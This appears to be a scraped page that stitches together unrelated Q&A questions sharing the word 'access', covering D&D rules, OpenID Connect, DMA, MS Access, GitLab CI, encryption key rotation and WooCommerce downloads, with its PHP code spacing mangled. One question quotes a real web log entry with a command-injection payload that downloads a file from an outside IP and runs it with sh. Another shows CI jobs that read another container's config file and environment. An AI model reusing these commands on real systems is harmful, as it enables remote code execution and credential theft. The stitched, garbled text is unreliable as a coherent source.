What do official sources say about player access to the Monster Manual?

The Introduction of the Monster Manual makes it clear several times that it is a book for DMs (MM, p. 4; emphasis mine):

This bestiary is for storytellers and world-builders. If you have ever thought about running a DUNGEONS & DRAGONS game for your friends, either a single night’s adventure or a long-running campaign, this tome contains page after page of inspiration.** […]

If you’re an experienced Dungeon Master (DM)**, a few of the monster write-ups might surprise you, for we’ve gone into the Monster Manuals of yore and discovered some long-lost factoids. […]

The best thing about being a DM is that you get to invent your own fantasy world and bring it to life, and nothing brings a D&D world to life more than the creatures that inhabit it. […]

The Monster Manual is one of three books that form the foundation of the DUNGEONS & DRAGONS game, the other two being the Player’s Handbook and the Dungeon Master’s Guide. The Monster Manual, like the Dungeon Master’s Guide, is a book for DMs.

However, it stops short of saying the Monster Manual is only for DMs, and does not specifically say that it should not be used by players.


Roll20, on the other hand, clearly made a decision to give players extensive access to information from the Monster Manual. Per the Roll20 wiki page for the Monster Manual:

Players can have direct access to the Monster Manual within the In-App Roll20 Compendium. You can share the Monster Manual with Compendium Sharing.


This is not a question about whether such information should be available to players – that is opinion-based and off-topic.

Rather, I am trying to understand:

  1. Besides the statements in the MM itself, what do other official sources say about to what extent the information players have access to the information in the MM?

  2. Did Roll20 ever explain their decision to provide players with full access to MM information?

While this is a list question, it is a bounded list – I am interested in official sources, and officially licensed sources.

It is not a ‘designer’s intent’ question in that I am not interested in opinion, interpretation, or speculation; I am just trying to track down relevant textual quotes about who has legitimate access to the MM information, and under what circumstances.

OpenID Connect with user bound roles and M2M access

I’m trying to get my head straight about how to properly design a OpenID connect provider and the roles to use with it. I understand the basic of scopes, claims and the different flow one can use. However, I’m trying to get my head around how I should handle the cases where i want M2M access to all resources, and a end user should only have access to his/her data.

My question is more related to how I should handle roles, is it overkill to have roles such as:

  • view_company_data
  • view_all_data

An example could be to provide a public API to access all data, e.g. collaborating companies, while also allowing me to have specific users to only access the data created by him/her. In my case that would be government body that wants access to all data, whilst the business owners should only have access to their own data.

I have an authentication provider, along with several resource servers. The business owners access their data through our client with only read/write permission for their own entity, and the government body wants access through our APIs to access all the data.

I wish to have all access control in a central entity, so generating access tokens on each separate resource server along with default JWT tokens from the authentication server seems like a bad idea. I’d rather handle it all from the authentication server.

Also a user should be able to generate these full-access tokens, given that they have an Global administration role.

So, what would be the right thing to do here?

How can a CPU be busy during DMA access with burst mode transfer

During burst mode in a DMA access, the DMAC has control over the bus for the whole transfer session which includes DATA PREPARATION time as well as DATA transfer time, after the transfer is over, the DMA relinquish the system bus. So in the mean time, the cpu can neither fetch any instruction from the MAIN MEMORY, nor it can fetch any operand, it can atmost complete the instruction it was executing before if that don’t include the use of system bus. In the book I have seen as cpu busy percent is given by

Data preparation time/(data prep time + data transfer time) How can the cpu be busy during the data preparation time when the bus is not with it. This can be the concept behind CYCLE STEAL mode, since it gains the bus only during data transfer, but how during burst mode??

Number of actions to access equipment

After it came up in the last session, i wanted to try and find Information on how long it takes to draw a weapon (from a scabbard, from your back) or a shield (from your back) or things from a pouch/backpack. I searched my (4.1) books, but the only thing I found was the special ability quickdraw (Schnellziehen) mentioning how long it takes for someone with the ability. Where in the (german, 4.1) books can I find this Information?

Very Strange Access Request to my website

Recently I got a very odd request to my website. This is from the log file:

20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 

It appears to be trying to run some shell commands, including what I believe to be downloading the source of a site with cURL. I tried to visit this URL but it was blocked by my security filter. What is kerbynet? Is this part of cloudflare and can it be used to run shell commands on my website?

It should be noted that I use Cloudflare.

query couldn’t be run or database table couldn’t be opened check the database table could not be opened (MS access +Excel)

full error query couldn’t be run or database table couldn’t be opened check the database. check your database server or contact your database administrator, make sure your database is available and hasn’t be moved or re-organised

Error comes up when user tries to refresh data data from Ms Access from an excel spreadsheet.

The both are on shared drives and user has access to both on shared drives, and can open the Ms access table directly from MS access.

Ran out of ideas

gitlab ci (self hosted), docker, access to other containers

Even if i’m not allowed to access a specific repo (or if i have low perms (cant see ci/cd vars)) i still can create one and do something like:

variables:   USER: gitlab build:   stage: build   image: docker:latest   script:     - docker ps -a     - docker images 

Then when i have what i need, i can:

variables:   USER: gitlab build:   stage: build   image: docker:latest     - docker exec <container> /bin/cat /var/www/html/config.php     - docker exec <container> /usr/bin/env 

How to avoid this kind of stuff?

PS: This is on a self hosted gitlab server.

PS2: Originaly post on stackoverflow, but im asking here since i didnt have any answer.

Pattern for access controlled client side encryption

How would you design a server/client system where a client is granted a key to encrypt/decrypt data, but the key could be revoked/redistributed by the server? Data encrypted prior must still be readable with the new key.

A simple scenario:

  1. Client wants to send a document to a server
  2. Client encrypts the document with some client-side credentials and sends to server
  3. Server receives document and stores in database
  4. Client requests document, receives, then decrypts. The roundtrip is complete.

Now, suppose the client credentials are compromised and key used to encrypt/decrypt data is stolen. The client changes their password, etc, but the key that can decrypt incoming data is still an issue.

My question is about redistributing an encryption key without having to re-encrypt all of the clients data. Are there any patterns that can help me with this? It feels like a variation of symmetric encryption with a KEK and DEK, but I’m having trouble figuring out how to encrypt something on the client side without exposing the DEK.

Downloadable Product Permission Issue – Grant Access automatically

When I order downloadable products, I can’t see them in my downloads page. When I checked the order details in the admin side, I saw that the downloadable product permissions part is blank even if the status of my order is completed.

I used paypal sandbox for testing. The order status was initially on-hold, and then I changed it to completed.

My functions.php:

function has_bought_item( $  product_id ) { global $  wpdb;  if( ! is_user_logged_in() )     return false;  $  current_user = wp_get_current_user();  $  statuses      = array_map( 'esc_sql', wc_get_is_paid_statuses() );  // Count the number of products $  count_query = $  wpdb->get_var( "     SELECT COUNT(woim.meta_value) FROM {$  wpdb->prefix}posts AS p     INNER JOIN {$  wpdb->prefix}postmeta AS pm ON p.ID = pm.post_id     INNER JOIN {$  wpdb->prefix}woocommerce_order_items AS woi ON p.ID = woi.order_id     INNER JOIN {$  wpdb->prefix}woocommerce_order_itemmeta AS woim ON woi.order_item_id = woim.order_item_id     WHERE p.post_status IN ( 'wc-" . implode( "','wc-", $  statuses ) . "' )     AND pm.meta_key = '_customer_user' AND pm.meta_value = $  current_user->ID     AND woim.meta_key IN ( '_product_id', '_variation_id' )     AND woim.meta_value = $  product_id " ); // Return true boolean value if count is higher than 0, if not false return $  count_query > 0 ? true : false; }  // Shop and archives - Replace add to cart ajax button to a custom linked button add_filter( 'woocommerce_loop_add_to_cart_link', 'replace_loop_add_to_cart', 20, 2 ); function replace_loop_add_to_cart( $  html, $  product ) { if( has_bought_item( $  product->get_id() ) ) {          $  text = __("Download", "woocommerce");          $  user_id = get_current_user_id();     $  downloads = wc_get_customer_available_downloads($  user_id);      if (!empty($  downloads)) {         foreach ($  downloads as $  download) {             if ($  download['product_id'] === $  product->get_id()) {                 $  link = $  download['download_url'];             }         }     }      $  html = '<a href="' . $  link . '" class="button alt add_to_cart_button">' . $  text . '</a>'; } return $  html; }  function add_completed_status_to_download_permission($  data, $  order) { if ( $  order->has_status( 'completed' ) ) { return true; } return $  data; } add_filter('woocommerce_order_is_download_permitted', 'add_completed_status_to_download_permission', 10, 2); 

My system status report:

### WordPress Environment ### WordPress address (URL): https://stg.myscrapchick.com Site address (URL): https://stg.myscrapchick.com WC Version: 4.3.1 REST API Version: ✔ 1.0.10 WC Blocks Version: ✔ 2.7.2 Action Scheduler Version: ✔ 3.1.6 WC Admin Version: ✔ 1.3.1 Log Directory Writable: ✔ WP Version: 5.4.2 WP Multisite: – WP Memory Limit: 2 GB WP Debug Mode: – WP Cron: – Language: en_US External object cache: –  ### Server Environment ###  Server Info: Apache PHP Version: 7.3.17 PHP Post Max Size: 2 GB PHP Time Limit: 600 PHP Max Input Vars: 16384 cURL Version: 7.29.0 NSS/3.44  SUHOSIN Installed: – MySQL Version: 5.5.5-10.2.31-MariaDB Max Upload Size: 2 GB Default Timezone is UTC: ✔ fsockopen/cURL: ✔ SoapClient: ✔ DOMDocument: ✔ GZip: ✔ Multibyte String: ✔ Remote Post: ✔ Remote Get: ✔  ### Database ###  WC Database Version: 4.3.1 WC Database Prefix: wp_ Total Database Size: 4286.03MB Database Data Size: 2622.78MB Database Index Size: 1663.25MB wp_woocommerce_sessions: Data: 0.54MB + Index: 0.02MB + Engine MyISAM wp_woocommerce_api_keys: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_attribute_taxonomies: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_downloadable_product_permissions: Data: 196.98MB + Index: 184.73MB + Engine MyISAM wp_woocommerce_order_items: Data: 80.96MB + Index: 44.21MB + Engine MyISAM wp_woocommerce_order_itemmeta: Data: 643.68MB + Index: 440.29MB + Engine MyISAM wp_woocommerce_tax_rates: Data: 0.00MB + Index: 0.01MB + Engine MyISAM wp_woocommerce_tax_rate_locations: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_shipping_zones: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_shipping_zone_locations: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_shipping_zone_methods: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_payment_tokens: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_payment_tokenmeta: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_woocommerce_log: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_actionscheduler_actions: Data: 1.55MB + Index: 0.58MB + Engine MyISAM wp_actionscheduler_claims: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_actionscheduler_groups: Data: 0.00MB + Index: 0.01MB + Engine MyISAM wp_actionscheduler_logs: Data: 1.14MB + Index: 0.91MB + Engine MyISAM wp_commentmeta: Data: 0.00MB + Index: 0.01MB + Engine MyISAM wp_comments: Data: 2.17MB + Index: 1.23MB + Engine MyISAM wp_email_log: Data: 152.56MB + Index: 0.00MB + Engine InnoDB wp_links: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_ninja_table_items: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_options: Data: 6.19MB + Index: 0.21MB + Engine MyISAM wp_postmeta: Data: 1251.84MB + Index: 837.68MB + Engine MyISAM wp_posts: Data: 140.07MB + Index: 45.37MB + Engine MyISAM wp_ppgc_categories: Data: 0.00MB + Index: 0.01MB + Engine MyISAM wp_ppgc_customers: Data: 2.09MB + Index: 2.91MB + Engine MyISAM wp_ppgc_orders: Data: 28.50MB + Index: 22.76MB + Engine MyISAM wp_ppgc_products: Data: 0.18MB + Index: 0.26MB + Engine MyISAM wp_simple_history: Data: 7.52MB + Index: 4.03MB + Engine InnoDB wp_simple_history_contexts: Data: 34.56MB + Index: 26.08MB + Engine InnoDB wp_termmeta: Data: 0.01MB + Index: 0.02MB + Engine MyISAM wp_terms: Data: 0.01MB + Index: 0.02MB + Engine MyISAM wp_term_relationships: Data: 0.21MB + Index: 0.42MB + Engine MyISAM wp_term_taxonomy: Data: 0.02MB + Index: 0.01MB + Engine MyISAM wp_tinvwl_analytics: Data: 1.52MB + Index: 0.36MB + Engine InnoDB wp_tinvwl_items: Data: 0.44MB + Index: 0.00MB + Engine InnoDB wp_tinvwl_lists: Data: 0.14MB + Index: 0.00MB + Engine InnoDB wp_usermeta: Data: 56.78MB + Index: 45.81MB + Engine MyISAM wp_users: Data: 2.85MB + Index: 2.79MB + Engine MyISAM wp_wcpv_commissions: Data: 0.30MB + Index: 0.00MB + Engine InnoDB wp_wcpv_per_product_shipping_rules: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wc_admin_notes: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_wc_admin_note_actions: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_wc_category_lookup: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_wc_customer_lookup: Data: 0.19MB + Index: 0.14MB + Engine MyISAM wp_wc_download_log: Data: 0.60MB + Index: 0.50MB + Engine MyISAM wp_wc_order_coupon_lookup: Data: 0.04MB + Index: 0.06MB + Engine MyISAM wp_wc_order_product_lookup: Data: 0.81MB + Index: 0.60MB + Engine MyISAM wp_wc_order_stats: Data: 0.16MB + Index: 0.14MB + Engine MyISAM wp_wc_order_tax_lookup: Data: 0.05MB + Index: 0.05MB + Engine MyISAM wp_wc_product_meta_lookup: Data: 0.16MB + Index: 0.20MB + Engine MyISAM wp_wc_reserved_stock: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wc_tax_rate_classes: Data: 0.00MB + Index: 0.01MB + Engine MyISAM wp_wc_webhooks: Data: 0.00MB + Index: 0.00MB + Engine MyISAM wp_wfblockediplog: Data: 0.05MB + Index: 0.00MB + Engine InnoDB wp_wfblocks7: Data: 0.02MB + Index: 0.05MB + Engine InnoDB wp_wfconfig: Data: 1.39MB + Index: 0.00MB + Engine InnoDB wp_wfcrawlers: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wffilechanges: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wffilemods: Data: 2.52MB + Index: 0.00MB + Engine InnoDB wp_wfhits: Data: 1.52MB + Index: 0.28MB + Engine InnoDB wp_wfhoover: Data: 0.02MB + Index: 0.02MB + Engine InnoDB wp_wfissues: Data: 0.02MB + Index: 0.06MB + Engine InnoDB wp_wfknownfilelist: Data: 1.52MB + Index: 0.00MB + Engine InnoDB wp_wflivetraffichuman: Data: 0.02MB + Index: 0.02MB + Engine InnoDB wp_wflocs: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wflogins: Data: 0.47MB + Index: 0.16MB + Engine InnoDB wp_wfls_2fa_secrets: Data: 0.02MB + Index: 0.02MB + Engine InnoDB wp_wfls_settings: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wfnotifications: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wfpendingissues: Data: 0.02MB + Index: 0.06MB + Engine InnoDB wp_wfreversecache: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wfsnipcache: Data: 0.02MB + Index: 0.05MB + Engine InnoDB wp_wfstatus: Data: 0.13MB + Index: 0.09MB + Engine InnoDB wp_wftrafficrates: Data: 0.02MB + Index: 0.00MB + Engine InnoDB wp_wpmailsmtp_tasks_meta: Data: 0.02MB + Index: 0.00MB + Engine InnoDB  ### Post Type Counts ###  attachment: 8211 ctct_forms: 3 ctct_lists: 5 custom_css: 2 customize_changeset: 36 elementor_library: 20 nav_menu_item: 9 page: 18 post: 160 product: 2533 revision: 410 shop_coupon: 19 shop_order: 577585 shop_order_refund: 34  ### Security ###  Secure connection (HTTPS): ✔ Hide errors from visitors: ✔  ### Active Plugins (26) ###  ManageWP - Worker: by GoDaddy – 4.9.6 WC Thanks Redirect: by Nitin Prakash – 2.2 – Installed version not tested with active version of WooCommerce 4.3.1 Better Search Replace: by Delicious Brains – 1.3.3 Classic Editor: by WordPress Contributors – 1.5 Constant Contact Forms for WordPress: by Constant Contact – 1.8.5 Login/Signup Popup ( Inline Form + Woocommerce ): by XootiX – 2.0 – Installed version not tested with active version of WooCommerce 4.3.1 Elementor Pro: by Elementor.com – 2.9.5 Elementor: by Elementor.com – 2.9.13 Email Log: by Sudar – 2.3.2 Site Kit by Google: by Google – 1.10.0 Grant download permissions for past WooCommerce orders: by Claudio Sanches – 0.0.2 – Installed version not tested with active version of WooCommerce 4.3.1 Insert Headers and Footers: by WPBeginner – 1.4.5 Kadence WooCommerce Email Designer: by Kadence WP – 1.4.2 – Installed version not tested with active version of WooCommerce 4.3.1 Regenerate Thumbnails: by Alex Mills (Viper007Bond) – 3.1.3 Remove Widget Titles: by Stephen Cronin – 1.0 Simple CSS: by Tom Usborne – 1.1.1 Simple History: by Pär Thernström – 2.34.0 Smoother: by Merkulove – 1.0.5 User Menus: by Code Atlantic – 1.2.3 WP Sheet Editor - WooCommerce Products (Premium): by WP Sheet Editor – 1.5.0 – Installed version not tested with active version of WooCommerce 4.3.1 Woo Title Limit: by Dima W. – 2.0.0 – Installed version not tested with active version of WooCommerce 4.3.1 WooCommerce Product Vendors: by WooCommerce – 2.1.32 – Installed version not tested with active version of WooCommerce 4.3.1 WooCommerce: by Automattic – 4.3.1 Wordfence Security: by Wordfence – 7.4.8 WordPress Importer: by wordpressdotorg – 0.7 WP Mail SMTP: by WPForms – 2.1.1  ### Inactive Plugins (5) ###  Already In Cart / Already Purchased: by MyThemeShop – 1.0.2 – Installed version not tested with active version of WooCommerce 4.3.1 TI WooCommerce Wishlist: by TemplateInvaders – 1.20.5 – Installed version not tested with active version of WooCommerce 4.3.1 WooCommerce Products Layout for Elementor: by AD-Theme – 1.0 – Installed version not tested with active version of WooCommerce 4.3.1 WP DataTable: by Samuel Behan – 0.2.5 WP Super Cache: by Automattic – 1.7.1  ### Must Use Plugins (2) ###  ManageWP - Worker Loader: by GoDaddy – Nexcess Managed Apps: by Nexcess – 1.9.1  ### Settings ###  API Enabled: ✔ Force SSL: – Currency: USD ($  ) Currency Position: left Thousand Separator: , Decimal Separator: . Number of Decimals: 2 Taxonomies: Product Types: external (external) grouped (grouped) simple (simple) variable (variable)  Taxonomies: Product Visibility: exclude-from-catalog (exclude-from-catalog) exclude-from-search (exclude-from-search) featured (featured) outofstock (outofstock) rated-1 (rated-1) rated-2 (rated-2) rated-3 (rated-3) rated-4 (rated-4) rated-5 (rated-5)  Connected to WooCommerce.com: –  ### WC Pages ###  Shop base: #5 - /shop/ Cart: ❌ Page does not contain the shortcode. Checkout: ❌ Page does not contain the shortcode. My account: ❌ Page does not contain the shortcode. Terms and conditions: #577437 - /terms-of-use-copyright/  ### Theme ###  Name: GeneratePress Child Version: 0.1 Author URL: https://tomusborne.com Child Theme: ✔ Parent Theme Name: GeneratePress Parent Theme Version: 2.4.2 Parent Theme Author URL: https://tomusborne.com WooCommerce Support: ✔  ### Templates ###  Overrides: generatepress_child/woocommerce/order/order-downloads.php generatepress_child/woocommerce/single-product/add-to-cart/simple.php  ### Action Scheduler ###  Complete: 6,179 Oldest: 2020-05-26 17:41:33 -0400 Newest: 2020-08-06 16:19:38 -0400 

I know we can manually grant access per order but access should be granted automatically, right? any help is highly appreciated.